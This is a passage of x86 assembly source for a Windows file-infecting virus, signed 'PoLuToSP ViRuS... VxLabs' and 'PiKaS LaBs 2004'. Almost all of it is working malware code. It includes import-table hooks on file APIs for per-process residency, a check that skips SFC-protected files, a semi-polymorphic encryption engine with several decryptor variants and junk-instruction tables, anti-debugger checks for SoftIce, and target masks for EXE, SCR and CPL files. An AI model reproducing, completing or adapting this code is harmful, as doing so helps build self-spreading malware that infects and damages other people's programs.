lodsb ; is called 2 or 3 times (like CPL ones)
stosb ; we have to change the first bytes
lodsd ; with a simple call to a FindFiles
stosd ; routine in the current Path and Finish
lodsw
stosw ; Move Instructions from a Internal Part
lodsw ; to the Virus Begin
stosw
lodsw
stosw
lodsd
stosd
lodsw
stosw
ret ; And Finish!
SetReEntrada endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Set one Resident Hook *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
SetHook proc
push esi ; Go to the Import Section Header
push edi
mov esi,[H_ImageBase+ebp]
add esi,[esi+3Ch]
add esi,80h
lodsd
add eax,[H_ImageBase+ebp] ; We have the poiner to Section Header
mov esi,eax
SetHook@1:
push esi
mov esi,[esi+0Ch] ; Well, look for a Kernel32 decriptor...
or esi,esi
jz SetHookError@1
add esi,[H_ImageBase+ebp]
lea edi,[N_Kernel+ebp]
mov ecx,08h
cld
rep cmpsb ; Compare it, if equal -> go on
pop esi
jz SetHook@2
add esi,14h
jmp SetHook@1
SetHook@2:
mov edx,[esi+10h] ; Great!... Find the API we wanna Hook
add edx,[H_ImageBase+ebp]
xor ebx,ebx
pop edi
mov eax,[edi] ; Look on First Thunk... whahaha!
SetHook@4:
mov ecx,[edx]
or ecx,ecx
jz SetHookError@2
cmp ecx,eax ; Check it now!... by address
jz SetHook@3
add edx,04h ; Try the next one
inc ebx
jmp SetHook@4 ; And go back
SetHook@3:
shl ebx,02h ; We have the Address of the API reference
add ebx,[esi+10h] ; in the Import Header... whahaha
add ebx,[H_ImageBase+ebp]
pop esi
xor eax,eax ; Great! Done! eax non zero value
inc eax
ret
SetHookError@1:
pop esi
pop edi
SetHookError@2:
pop esi
xor eax,eax ; Ups! Shit! eax zero
ret
SetHook endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Check if a File is SFC protected *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
SfcIsFileProtected proc
push esi ; Save some Registers
push edi
mov ecx,[@_SfcIsFileProtected+ebp] ; Have the System SFC protection?
or ecx,ecx
jz NoHaySfc@1 ; If not... skip this part!
lea edi,[BufferTres+ebp]
push edi
xor eax,eax ; Take the actual Path in Unicode
SfcBucle@1: ; and add to it the File Name
scasw
jnz SfcBucle@1
mov al,'\' ; And now the Actual File Name
mov [edi-02h],ax
mov ebx,edi
SfcBucle@2:
lodsb
stosw
or eax,eax
jnz SfcBucle@2
push eax
call ecx ; Is File with SFC protected?
dec ebx
dec ebx
xor ecx,ecx
mov [ebx],cx ; Make the actual Path as the begin
NoHaySfc@1:
pop edi
pop esi
ret ; eax zero if not protected with SFC
SfcIsFileProtected endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Truncate the Host Size *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
TruncarHostNuevo proc
xor eax,eax ; Truncate the Open File
push eax
push eax
push ebx
push dword ptr[H_HandleOpen+ebp] ; Set the File Pointer where we want
call [@_SetFilePointer+ebp]
push dword ptr[H_HandleOpen+ebp] ; Set there the End of File
call [@_SetEndOfFile+ebp]
ret
TruncarHostNuevo endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Unmap one File from Memory *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
UnmapFile proc
push ebx
call [@_UnmapViewOfFile+ebp] ; Simple Unmap the File from Memory
ret
UnmapFile endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* All Posible Decriptors of Virus *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_Decriptores:
V_Dec@0:
mov ecx,5A5A5A5Ah ; All the Decriptors basic structure...
mov edx,TamVirus@1 ; But many instructions are changed
lea esi,[V_Virus+ebp] ; while we're building a new decriptor
V_Buc@0:
ror byte ptr[esi],cl ; Operate with one byte
add byte ptr[esi],cl
inc esi ; Increment the pointer
ror ecx,08h ; Rotate the 32 bits Key
dec edx ; Decrement the counter and go on
jnz V_Buc@0
V_Dec@1:
mov ecx,5A5A5A5Ah
mov edx,TamVirus@1
lea esi,[V_Virus+ebp]
V_Buc@1:
xor byte ptr[esi],cl
add byte ptr[esi],cl
inc esi
ror ecx,08h
dec edx
jnz V_Buc@1
V_Dec@2:
mov ecx,5A5A5A5Ah
mov edx,TamVirus@1
lea esi,[V_Virus+ebp]
V_Buc@2:
add byte ptr[esi],cl
rol byte ptr[esi],cl
inc esi
ror ecx,08h
dec edx
jnz V_Buc@2
V_Dec@3:
mov ecx,5A5A5A5Ah
mov edx,TamVirus@1
lea esi,[V_Virus+ebp]
V_Buc@3:
rol byte ptr[esi],cl
xor byte ptr[esi],cl
inc esi
ror ecx,08h
dec edx
jnz V_Buc@3
V_Dec@4:
mov ecx,5A5A5A5Ah
mov edx,TamVirus@1
lea esi,[V_Virus+ebp]
V_Buc@4:
xor byte ptr[esi],cl
sub byte ptr[esi],cl
inc esi
ror ecx,08h
dec edx
jnz V_Buc@4
V_Dec@5:
mov ecx,5A5A5A5Ah
mov edx,TamVirus@1
lea esi,[V_Virus+ebp]
V_Buc@5:
sub byte ptr[esi],cl
ror byte ptr[esi],cl
inc esi
ror ecx,08h
dec edx
jnz V_Buc@5
V_Dec@6:
mov ecx,5A5A5A5Ah
mov edx,TamVirus@1
lea esi,[V_Virus+ebp]
V_Buc@6:
ror byte ptr[esi],cl
xor byte ptr[esi],cl
inc esi
ror ecx,08h
dec edx
jnz V_Buc@6
V_Dec@7:
mov ecx,5A5A5A5Ah
mov edx,TamVirus@1
lea esi,[V_Virus+ebp]
V_Buc@7:
add byte ptr[esi],cl
ror byte ptr[esi],cl
inc esi
ror ecx,08h
dec edx
jnz V_Buc@7
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* All Posible Encriptor instructions of Virus *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_Encriptores:
V_Enc@0:
sub byte ptr[edi],cl ; All the possible Encriptors that are used
rol byte ptr[edi],cl ; when we Encript the Virus Body in a New Host
V_Enc@1:
sub byte ptr[edi],cl ; Operate with one byte
xor byte ptr[edi],cl
V_Enc@2:
ror byte ptr[edi],cl
sub byte ptr[edi],cl
V_Enc@3:
xor byte ptr[edi],cl
ror byte ptr[edi],cl
V_Enc@4:
add byte ptr[edi],cl
xor byte ptr[edi],cl
V_Enc@5:
rol byte ptr[edi],cl
add byte ptr[edi],cl
V_Enc@6:
xor byte ptr[edi],cl
rol byte ptr[edi],cl
V_Enc@7:
rol byte ptr[edi],cl
sub byte ptr[edi],cl
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Shit Instructions used by the Semi-Morfic engine *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_UnByte:
aaa ; Shit Instructions (1 Byte)
aas ; The other registers are used in decriptor routine
clc
cmc
daa
das
dec eax
dec ebx
inc eax
inc ebx
lahf
nop
sahf
stc
xchg eax,ebx
xchg ebx,eax
V_DosBytes:
add eax,ebx ; Shit Instructions (2 Bytes)
add ebx,eax
adc eax,ebx
adc ebx,eax
and eax,ebx
and ebx,eax
bswap eax
bswap ebx
cbw
mov eax,ebx
mov ebx,eax
neg eax
neg ebx
not eax
not ebx
or eax,ebx
or ebx,eax
push eax
pop ebx
push ebx
pop eax
pushf
popf
rol eax,cl
rol ebx,cl
ror eax,cl
ror ebx,cl
shl eax,cl
shl ebx,cl
shr eax,cl
shr ebx,cl
xor eax,eax
xor ebx,ebx
xor eax,ebx
xor ebx,eax
V_TresBytes:
add ax,bx ; Shit Instructions (3 Bytes)
add bx,ax
adc ax,bx
adc bx,ax
and ax,bx
and bx,ax
bswap ax
bswap bx
lea eax,[eax+ebp]
lea eax,[ebx+ebp]
lea ebx,[eax+ebp]
lea ebx,[ebx+ebp]
mov ax,bx
mov bx,ax
neg ax
neg bx
not ax
not bx
or ax,bx
or bx,ax
rol ax,cl
rol bx,cl
ror ax,cl
ror bx,cl
shl ax,cl
shl bx,cl
shr ax,cl
shr bx,cl
xor ax,ax
xor bx,bx
xor ax,bx
xor bx,ax
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Re-Entry used Instructions *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_ReEntrada:
mov eax,offset BuscarArchivos ; Instructions that are copied to the begin
add eax,ebp ; of Virus, to make possible the Re-Entry
call eax ; in the CPL Files
lea eax,[V_VueltaHost+ebp] ; Make a Search in actual Path and come back
jmp eax ; to the Infected Host
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Entry Point First Instructions *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_EntryPoint:
call AlinearCifra ; Instructions that are copied to last
ret ; 6 bytes of Code Section (Hard-Coded)
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Structures used by the Virus *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
BufferDos db MAX_PATH dup (?) ; Windows and System Path
BufferTres dw MAX_PATH dup (?) ; Actual Path in Unicode
BufferUno db MAX_PATH dup (?) ; Initial Path of the Host
DatosArchivo WIN32_FIND_DATA ? ; Structure to Find Files
V_Info@1:
InfoMemoria MEMORY_BASIC_INFORMATION ? ; Structure to Info a Memory Block
V_Info@2:
SysDate SYSTEMTIME ? ; Structure for System Time
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Global Variables used by the Virus *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
H_Alineamiento dd ? ; Section Alignment of the Host
H_AtributosFile dd ? ; Real Attributes of New Host
H_Delta dd ? ; Partial calculated Delta, used in infection
H_HandleArchivo dd ? ; File Handle
H_HandleMapa dd ? ; Map Handle
H_HandleOpen dd ? ; Open Handle
H_HandlePantalla dd ? ; Screen Handle, used in Payload
H_ImageBase dd ? ; The actual Host Image Base
H_NumLetrasA dd ? ; Length of actual Path
H_NumLetrasB dd ? ; Length of Windows or System Path
H_Proteccion dd ? ; Memory Protection
H_RawText dd ? ; Raw of Code Section in New Host
H_RvaHost dd ? ; Entry Point of actual Host
H_RvaText dd ? ; Rva of Code Section in New Host
H_RvaVirus dd ? ; Rva of Virus Entry
H_Semilla dd ? ; Seed used by the Random Number Generator
H_TamHostVirus dd ? ; Size of Total Infected File
H_TextHeader dd ? ; Rva to Code Section Header
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Addresses that we use (APIs, etc...) *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
@_KernelAddress dd ? ; Address used to find Kernel Base and
@_AddressTable dd ? ; the GetProcAddress API
@_NameTable dd ?
@_OrdinalTable dd ?
@_DirArchivo dd ?
@_GetProcAddress dd ?
V_Direcciones@1:
@_GetFileAttributesA dd ? ; All the APIs addresses needed
@_SetFileAttributesA dd ?
@_SetFileTime dd ?
@_VirtualProtect dd ?
@_VirtualQuery dd ?
@_SetFilePointer dd ?
@_SetEndOfFile dd ?
@_Beep dd ?
@_LoadLibraryA dd ?
@_GetSystemTime dd ?
@_GetTickCount dd ?
@_CreateFileMappingA dd ?
@_MapViewOfFile dd ?
@_UnmapViewOfFile dd ?
@_FindClose dd ?
@_SetCurrentDirectoryA dd ?
@_GetCurrentDirectoryA dd ?
@_GetWindowsDirectoryA dd ?
@_GetSystemDirectoryA dd ?
@_CloseHandle dd ?
@_ExitProcess dd ?
V_Direcciones@4:
@_MoveFileA dd ?
@_CopyFileA dd ?
@_DeleteFileA dd ?
@_CreateFileA dd ?
@_GetModuleHandleA dd ?
@_FindFirstFileA dd ?
@_FindNextFileA dd ?
@_FinalDirecciones dd 00h
V_Direcciones@2:
@_GetDC dd ?
V_Direcciones@3:
@_CreateSolidBrush dd ?
@_SelectObject dd ?
@_Ellipse dd ?
V_Direcciones@5:
@_SfcIsFileProtected dd ?
V_Offsets@1:
V_Hook@1 dd offset HookMoveFileA ; offsets to process used to hook
V_Hook@2 dd offset HookCopyFileA ; calls in Per-Process Resident
V_Hook@3 dd offset HookDeleteFileA
V_Hook@4 dd offset HookCreateFileA
V_Hook@5 dd offset HookGetModuleHandleA
V_Hook@6 dd offset HookFindFirstFileA
V_Hook@7 dd offset HookFindNextFileA
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Strings used by the Virus *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
N_GdiLib db 'GDI32.dll',0 ; Some Strings for Libraries names
N_IsDebuggerPresent db 'IsDebuggerPresent',0
N_Kernel db 'KERNEL32',0
V_Mascara@1:
N_MascaraA db '*.EXE',0 ; Targets Strings
N_MascaraB db '*.SCR',0
N_MascaraC db '*.CPL',0,0BBh
N_Nice db '\\.\NTICE',0 ; To Avoid SoftIce in win9x and winNT
N_Sice db '\\.\SICE',0
N_SfcLib db 'SFC.dll',0
N_UserLib db 'USER32.dll',0
V_Nombres@1:
N_GetFileAttributesA db 'GetFileAttributesA',0 ; Strings of all APIs needed
N_SetFileAttributesA db 'SetFileAttributesA',0
N_SetFileTime db 'SetFileTime',0
N_VirtualProtect db 'VirtualProtect',0
N_VirtualQuery db 'VirtualQuery',0
N_SetFilePointer db 'SetFilePointer',0
N_SetEndOfFile db 'SetEndOfFile',0
N_Beep db 'Beep',0
N_LoadLibraryA db 'LoadLibraryA',0
N_GetSystemTime db 'GetSystemTime',0
N_GetTickCount db 'GetTickCount',0
N_CreateFileMappingA db 'CreateFileMappingA',0
N_MapViewOfFile db 'MapViewOfFile',0
N_UnmapViewOfFile db 'UnmapViewOfFile',0
N_FindClose db 'FindClose',0
N_SetCurrentDirectoryA db 'SetCurrentDirectoryA',0
N_GetCurrentDirectoryA db 'GetCurrentDirectoryA',0
N_GetWindowsDirectoryA db 'GetWindowsDirectoryA',0
N_GetSystemDirectoryA db 'GetSystemDirectoryA',0
N_CloseHandle db 'CloseHandle',0
N_ExitProcess db 'ExitProcess',0
V_Nombres@4:
N_MoveFileA db 'MoveFileA',0
N_CopyFileA db 'CopyFileA',0
N_DeleteFileA db 'DeleteFileA',0
N_CreateFileA db 'CreateFileA',0
N_GetModuleHandleA db 'GetModuleHandleA',0
N_FindFirstFileA db 'FindFirstFileA',0
N_FindNextFileA db 'FindNextFileA',0,0BBh
V_Nombres@2:
N_GetDC db 'GetDC',0,0BBh
V_Nombres@3:
N_CreateSolidBrush db 'CreateSolidBrush',0
N_SelectObject db 'SelectObject',0
N_Ellipse db 'Ellipse',0,0BBh
V_Nombres@5:
N_SfcIsFileProtected db 'SfcIsFileProtected',0,0BBh
N_PiKaS db 'PoLuToSP ViRuS... VxLabs (Made in Spain)',0 ; A stupid mark
V_FinalVirus:
end V_Entrada
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* (Learning To Live-Dream Theater) PiKaS LaBs 2004 *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
View Git Blame Copy Permalink